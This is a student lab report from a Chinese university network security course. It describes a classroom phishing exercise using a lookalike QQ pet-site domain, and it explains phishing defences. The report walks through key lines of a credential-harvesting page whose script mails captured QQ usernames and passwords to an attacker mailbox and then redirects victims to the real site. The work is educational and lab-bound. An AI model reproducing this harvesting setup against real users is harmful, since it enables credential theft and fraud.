南京工程學院 實

　驗

　報

　告

　題

　目

　 網站釣魚攻擊

　 課 程 名 稱

　網絡與信息安全技術

　院(系、部、中心)

　 計算機工程學院

　專

　 業

　網絡工程

　班

　 級

　 學 生 姓 名

　 學

　 號

　 設 計 地 點

　 信息樓 A216

　 指 導 教 師

　 毛云貴

　 實 驗 時 間

　2014 年 3 月 20 日

　實 驗 成 績

　一實驗目的 1、了解釣魚攻擊的概念與實現原理 2、了解釣魚網站與正常網站的區別 3、提高抵御釣魚攻擊的能力 二實驗環境 Windows,交換網絡結構, UltraEdit

　三實驗原理 3 3 、1 1. . 什么就 是釣魚網站

　網絡釣魚就是通過大量發送聲稱來自于銀行或其她知名機構的欺騙性垃圾郵件,意圖引誘收信人給出敏感信息(如用戶名、口令、帳號 ID、ATM PIN 碼或信用卡詳細信息)的一

　種攻擊方式。最典型的網絡釣魚攻擊將收信人引誘到一個通過精心設計與目標組織的網站非常相似的釣魚網站上,并獲取收信人在此網站上輸入的個人敏感信息,通常這個攻擊過程不會讓受害者警覺。這些個人信息對黑客們具有非常大的吸引力,因為這些信息使得她們可以假冒受害者進行欺詐性金融交易,從而獲得經濟利益。受害者經常遭受嚴重的經濟損失或個人信息被竊取。

　 釣魚網站通常偽裝成為銀行網站,竊取訪問者提交的賬號與密碼信息。它一般通過電子郵件傳播,此類郵件中包含一個經過偽裝的鏈接,該鏈接將收件人鏈接到釣魚網站。釣魚網站的頁面與真實網站界面完全一致,要求訪問者提交賬號與密碼。一般來說釣魚網站結構很簡單,只就是一個或幾個頁面,URL 與真實網站有細微差別,如真實的工行網站為、com、cn,針對工行的釣魚網站則可能為、com、cn。

　3 3 、2 2. . 釣魚網站的防范措施

　1、啟用專用域名

　 現在的網址有好幾種,、com 就是一個商業性網站,而、gov 就是政府網站,、org 則就是非政府組織網站。域名不同,代表的意思也不同。因此可以借鑒政府網站有專用域名做法,為網上銀行設置專用域名。這種作法雖然從根本上無法杜絕釣魚網站的存在,但確實在很大程度上打擊了假冒的網銀網站。

　2、規范搜索引擎

　 在網銀安全問題上,銀行惟一能采取的辦法就就是投入大量的人力物力,不間斷地在網上通過人工或就是自動搜索同自己域名類似的假冒網站、網絡實名,甚至必須介入電子郵件搜索就是否有人假借銀行名義行欺騙之實,即使就是幾個銀行聯合起來打假,平攤的只就是成本,技術始終就是個難題。因此可以規范搜索引擎,從搜索引擎層面上來干預與網上銀行域名類似的網站。

　3、銀行數字證書

　 銀行可以通過使用銀行證書的方式來驗明網上銀行的正身,只有擁有正確的證書才能證明該網站就是正確的網上銀行而不就是釣魚網站。

　4、客戶安全使用網銀

　 (1)避免使用搜索引擎

　 從正規銀行網點取得網絡銀行網址并牢記,登錄網銀時盡量避免使用搜索引擎或網絡實名,以免混淆視聽。

　 (2)設置混合密碼、雙密碼

　 密碼設置應避免與個人資料相關,建議選用數字、字母混合密碼,提高密碼破解難度并妥善保管,交易密碼盡量與信用卡密碼不同。

　 (3)定期查瞧交易記錄 定期查瞧網銀辦理的轉帳與支付等業務記錄,或通過短信定制賬戶變動通知,隨時掌握賬戶變動情況。

　 (4)妥善保管數字證書

　 避免在公用計算機上使用網銀,以防數字證書等機密資料落入她人之手。

　 (5)警惕電子郵件鏈接

　 網上銀行一般不會通過電子郵件發出“系統維護、升級”提示,若遇重大事件,系統必須暫停服務,銀行會提前公告顧客。一旦發現資料被盜,應立即修改相關交易密碼或進行銀行卡掛失。

　三. . 釣魚網站的關鍵源碼分析

　釣魚網站的位置:“C:\ExpNIS\SocEng-Lab\Fishing\釣魚網站\qqqet”,用UltraEdit-32 可查瞧或編輯源碼。

　釣魚網站構造比較簡單,主要組成部分其實就就是兩個文件 index、htm,steal、asp。index、htm 為釣魚網站的前臺表現頁面,steal、asp 為釣魚網站的后臺控制程序。具體分析一下這兩個文件。

　1、index、htm 文件

　 用戶使用域名“、qq、com”登錄釣魚網站后,進入的頁面就就是 index、htm,該頁就是釣魚網站的表現頁面,其主要完成表單提交,用戶信息就是否為空的驗證,驗證用戶信息不為空的話,就將用戶輸入的信息傳入 steal、asp。頁面源碼中很多都就是為頁面的表現形式,表現效果服務的,這些源碼不做分析。下面分析一下關鍵代碼:

　 上行代碼解析: (1)“name”就是表單的名稱,這里給該表單命名為“form1”。

　 (2)“onsubmit="return checkinput()"”就是提交表單之前執行的方法,在下一大 段代碼中會具體介紹 checkinput()方法。

　 (3)“action=steal、asp”就是提交表單后跳轉的文件,這里就是跳轉到 steal、asp。

　 (4)“method=post”就是表單提交方法,該方法有兩種,一種就是 post,一種就是get。post 就是隱含參數提交,就就是提交的時候 url 中不顯示用戶名,密碼信息。get 就是顯示參數提交,就就是提交的時候 url 中顯示用戶名,密碼信息。

　上段代碼大部分都就是效果與表現形式,關鍵的部分用粗體字代替。這段代碼就是建立一個

　文本輸入框,“type=text”就是給輸入框的類型定義為文本形式,“name=u”就是將文本輸入框的名稱定義為“u”,“u、value”就就是文本框輸入的內容。

　上段代碼就是建立一個密碼輸入框,“type=password”就是給輸入框定義為密碼形式,“name=p”就是將密碼輸入框的名稱定義為“p”,“p、value”就就是密碼框輸入的內容。

　上段代碼的意思就是建立一個登錄的按鈕,用于提交用戶信息的。表單部分的代碼中onsubmit="return checkinput()"”,它的意思就是調用下面這段代碼。

　上段代碼解析:

　 (1)“if(document、form1、u、value=="")”if 條件判斷,“document、form1、u、value”就是取得文本框中內容,也就就是 QQ 號碼,對它進行判斷,判斷它的內容就是不就是空值,如果就是空值,就執行下面{}中的內容。

　 (2)“alert("您還沒有輸入 QQ 號碼")”alert 就是彈出對話框,對話框的內容就是“您還沒有輸入 QQ 號碼”。

　 (3)“document、form1、u、focus()”將鼠標焦點定位到文本框的位置。

　 (4)“return false”返回值就是“false”,即不提交表單內容,返回“index、htm”。

　2、steal、asp 文件

　 用戶提交表單后,將用戶信息傳入 steal、asp 中,在 steal、asp 中進行業務邏輯處理。

　 具體處理的內容:將用戶信息以郵件的形式發送到指定郵箱,彈出誤導對話框,引導

　到正常網站。關鍵代碼解析: 上段代碼解析:代碼中引用 VBScript 腳本語言,“u=request、form("u")”在該頁取得表單提交的文本框內容,即 QQ 號碼,定義為“u”,“p=request、form("p")”在該頁取得表單提交的密碼框內容,即 QQ 密碼,定義為“p”。下面這段代碼就是引用 vbs 腳本,功能就是負 發 送 郵 件 ( 將 用 戶 輸 入 的 內 容 , 以 郵 件 的 形 式 發 送 到 指 定 郵 箱 ) 。

　上段關鍵代碼解析:

　 (1)“NameSpace="、microsoft、com/cdo/configuration/"”定義 NameSpace 命名空間。

　 (2)“Set Email = CreateObject("CDO、Message")”開啟郵件服務。

　 (3)“Email、From = "anyone@CServer、NetLab"”郵件發送方的郵箱。

　(4)“Email、To = "xxxxx@CServer、NetLab"”郵件接收方的郵箱。

　 (5)“Email、Subject = "username and password"”發送郵件的主題。

　 (6)“Email、Textbody = "username:" & u & " " & "password:" & p”發送郵件的具體內容,即 username:“用戶的 QQ 號碼”,password:“用戶的 QQ 密碼”。

　 (7)“Item(NameSpace&"smtpserver") = "172、16、0、254"”接收郵件的服務器。

　 (8)“Item(NameSpace&"smtpauthenticate") = 0”設置郵件發送者就是否為匿名用戶發送,設置為 0 則為匿名用戶發送,若設置為 0 則不用設置“Email、From”的郵箱(發送者的郵箱)。設置為 1 則為真實存在的用戶發送,發送者的郵箱,郵箱的用戶名,密碼必須就是真實 存 在 的 , 即 “Email 、

　From”,“Item(NameSpace&"sendusername")”,“Item(NameSpace&"sendpassword")” 必須設置真實存在的郵箱名,郵箱用戶名,郵箱密碼。此處作為攻擊用,必須設置為 0。

　 (9)“Item(NameSpace&"sendusername") = "any"” 與“Item(NameSpace&"sendpassword") = "any"” 郵 件 發 送 者 的 郵 箱 用 戶 名 , 因 為“Item(NameSpace&"smtpauthenticate")”設置為 0,所以這兩句腳本沒用到,用"注釋掉了。

　 (10)“Update”將上面設置的內容在程序執行的時候更新確認。

　 (11)“Email、Send”郵件發送出去。

　 下面的代碼主要就是欺騙誤登錄釣魚網站的用戶,將用戶引導到正常網站。

　上段代碼很多處都就是html標簽,用于網頁顯示。關鍵代碼就是javascript部分,解析如下:

　 (1)“alert("用戶名或密碼輸入錯誤!")”彈出提示對話框,對話框內容就是“用戶名或密碼輸入錯誤！”。

　 (2)“window、location="、qqpet、qq、com";”將用戶引導到正常網站,用的就是javascript 中“window、location”方法。用法就就是 window、location=“要跳轉到的地址(域名或 ip 地址)”。

　 釣魚網站關鍵的源碼分析完畢,正常網站的源碼只有一個 index、htm 文件,與釣魚網站中的 index、htm 文件類似,不做具體分析。

　四實驗方法及步驟 本練習主機 A、B、C 為一組,D、E、F 為一組,下面以主機 A、B、C 為例,說明實驗步驟 實驗主機 實驗角色 主機 A 釣魚網站,黑客 主機 B 正常網站,DNS 服務器 主機 C 被欺騙者

　首先使用“快照 X”恢復 Windows 系統環境。

　一. . 初始化環境的準備

　1.主機 A 的操作 (1)主機 A 配置 Outlook Express 郵箱,建立郵件帳戶(參見附錄 A-Outlook Express 配置方法)。這里以“user1A@CServer、NetLab”郵箱為例說明實驗步驟。

　(2)更改釣魚網站源碼中接收郵件的郵箱(源碼分析詳見實驗原理)。進入釣魚網站目錄“C:\ExpNIS\SocEng-Lab\Fishing\釣魚網站\qqqet”,點擊右鍵使用 UltraEdit 打開steal、asp,如圖 4-1 所示:

　 圖 4-1

　郵件發送源碼

　 將上圖中標記內容,更改為主機 A 配置好的郵箱,保存后退出。

　 (3)發布釣魚網站。單擊“開始”|“程序”|“管理工具”|“Internet 信息服務(IIS)管理器”,啟動釣魚網站。

　 「注」啟動釣魚網站之前要先關閉默認網站與正常網站,默認網站,釣魚網站,正常網站端口號都就是 80,只允許開啟一個網站。

　(4)主機 A 配置 DNS 服務器為主機 B 的 ip。

　2.主機 B 的操作

　(1)安裝 DNS,具體步驟:

　 ●

　點擊“開始”|“設置”|“控制面板”|“添加或刪除程序”|“添加/刪除Windows 組件(A)”,彈出“Windows 組件向導”的窗口,在組件中將鼠標焦點定位到“網絡服務”的選項上,如圖 4-2 所示:

　圖 4-2

　Windows 組件向導

　 ●

　點擊“詳細信息”,然后在網絡服務的子組件中選擇域名系統(DNS),選擇后點擊“確定”。

　 ●

　點擊“下一步”,進入安裝界面,約 2 秒后,彈出所需文件窗口,點擊“瀏覽”,進入到

　“C:\ExpNIS\SocEng-Lab\Tools\DNS 安裝組件”,選擇 DNSMGR、DL_,點擊“打開”。然后點擊“確定”,安裝過程中會出現“Windows 文件保護”的提示對話框,如圖 4-3 所示:

　圖 4-3

　DNS 組件安裝過程

　 將此對話框關閉,繼續點擊“瀏覽”,還就是進入到“C:\ExpNIS\SocEng-Lab\Tools\DNS 安裝組件”,選擇 DNSMGMT、MS_,點擊“打開”,然后再點擊“確定”,安裝即將完成的時候會彈出“可選網絡組件”的提示對話框,如圖 4-4 所示:

　圖 4-4

　可選網絡組件對話框

　(2)配置 DNS,具體步驟:

　 ●

　單擊“開始”|“程序”|“管理工具”|“DNS”,進入 DNS 配置界面,點擊主機展開樹,如圖 4-5 所示:

　圖 4-5

　DNS 配置 ●

　右鍵點擊“正向查找區域”,選擇新建區域,彈出新建區域向導,點擊“下一步”,然后選擇默認的主要區域,繼續點擊“下一步”。

　 ●

　在區域名稱處填寫“qqpet、qq、com”,一直點擊擊“下一步”,最后點擊“完成”。

　 ●

　右鍵點擊“qqpet、qq、com”,選擇新建主機,彈出新建主機的窗口,在名稱處填寫“www”,在ip地址處填寫“ 主機B的IP地址 ”(此域名為正常網站的域名,根據角色分配得知,正常網站存在于主機 B 中),點擊“添加主機”,彈出成功添加主機記錄的對話框,點擊“確定”,再點擊“完成”就成功創建了主機。

　 ●

　根據上面的方法,再新建一個區域名為“qqqet、qq、com”的區域,并在這個區域中新建名為“www”的主機,ip 地址為 主機 A 的 IP 地址 (此域名為釣魚網站的域名,根據角色分配得知,釣魚網站存在于主機 A 中)。

　(3)發布正常網站。打開 IIS,啟動正常網站。

　 「注」啟動正常網站之前要先關閉釣魚網站與默認網站,默認網站,釣魚網站,正常網站端口號都就是 80,只允許開啟一個網站。

　3.主機 C 的操作

　 主機 C 配置 DNS 服務器為 主機 B 的 IP 地址 。

　 二. . 釣魚式手法模擬

　1.主機 C 登錄釣魚網站

　 假設主機 C 誤輸入,造成主機 C 進入到釣魚網站。主機 C 在瀏覽器中使用域名“、qq、com”,登錄到釣魚網站,仔細觀察頁面信息與域名信息。

　2.主機 C 在釣魚網站輸入相關信息

　 主機 C 在釣魚網站中輸入 QQ 號碼與 QQ 密碼,QQ 號碼:123456。QQ 密碼:admin,(此用戶名與密碼均為正確的,在正常網站中使用會有所體現),單擊“登錄”,之后會彈出一個對話框”用戶名或密碼錯誤”,“確定”后會引導到正常網站。同時剛才輸入的 QQ 號碼與 QQ密碼會以郵件的形式發送到主機 A 的郵箱。

　3.主機 C 在正常網站輸入相關信息

　 主機 C 跳轉到正常網站后,仔細觀察域名與頁面信息。觀察后得知,與釣魚網站相比,頁面信息沒什么變化,只就是域名發生了細微的變化,“、qq、com”變成了“、qq、com”,如果不仔細觀察,很難發現這一點。主機 C 繼續操作,QQ 號碼輸入“123456”,QQ 密碼輸入“admin”,登錄后會有登錄成功的提示。

　4.主機 A 登錄郵箱,查瞧郵件

　 主機 A 登錄 Outlook Express 郵箱,打開收到的新郵件,內容就是主機 C 在釣魚網站輸入的 QQ 號碼與 QQ 密碼,對比一下主機 C 記錄的 QQ 號碼與 QQ 密碼。

　5.主機 A 登錄正常網站

　 主機 A 用域名“、qq、com”登錄正常網站,用釣到的“主機 C 的用戶信息”進行登錄。

　6.主機 C 的防范方法

　 用戶應該注意提高自己的安全意識,不要通過搜索引擎、匿名郵件、陌生電話等提供的網址訪問網上銀行等,要注意對域名信息的仔細辨別,以防止不慎訪問釣魚網站。

　五實驗數據記錄及分析 首先主機 A 配置 Outlook Express 郵箱,建立郵件帳戶,具體如圖 5-1

　 圖 圖 5-1 機 主機 A 發布釣魚網站, 如圖 5-2 所示

　圖 圖 5-2 機 主機 B DNS 服務器配置如圖 5-3 所示

　 圖 圖 5-3 實驗成功截取了主機 機 c 主機輸入的 qq 用戶名與密碼,圖 圖 5-4 所示

　圖 圖 5--4 六實驗總結 通過本次實驗,我能將課堂上學習的知識在試驗中得到驗證,加深對相關知識點的理解。不僅掌握了釣魚網站相關知識以及維護中常用的工具而且對網絡安全有了更加深入的理解。

　 總之,這次實驗讓我受益匪淺,不僅學到了新的知識,還讓以前書本上學的理論知識在實踐中加以應用,做到學以致用。還有,養成的一些良好習慣,對以后的學習與工作都就是有幫助的。

　這次實驗不僅讓我復習了釣魚網站的相關知識,而且將網絡安全技術的知識融匯貫通,讓我們在課堂上學習的知識有了實踐的機會,充分鍛煉了自己的動手能力,并且將書本上抽象的理論上升到了應用的高度,讓知識緊密圍繞應用,以興趣激發學習 。

　教師評閱: :

　90-95 分: 實驗課前做了充足的準備工作,與專業相關知識能緊密聯系。實驗報告條理清晰,書寫規范,圖文并茂,報告內容全面,主要內容闡述詳細。認識體會深刻,起到了實驗的目的。

　80-85 分: 實驗課前做了充足的準備工作,與專業相關知識能較緊密聯系。實驗報告條理清晰,書寫規范,圖文并茂,報告內容較全面,主要內容闡述較詳細。認識體會較深刻,達到了實驗的作用。

　70-75 分: 實驗課前準備較充足,與專業相關知識能基本能聯系,實驗報告條理清晰,書寫較規范,報告內容較全面,能用部分圖片展示相關內容,主要內容闡述較詳細。認識體會較深刻,達到了實驗的目的。

　60-65 分: 實驗課前準備不夠充足,與專業相關知識不能緊密聯系。實驗報告條理基本清晰,書寫基本規范,報告內容基本全面,主要內容闡述基本詳細。認識體會不太深刻,基本達到實驗的目的。

推薦訪問： 實驗 釣魚 攻擊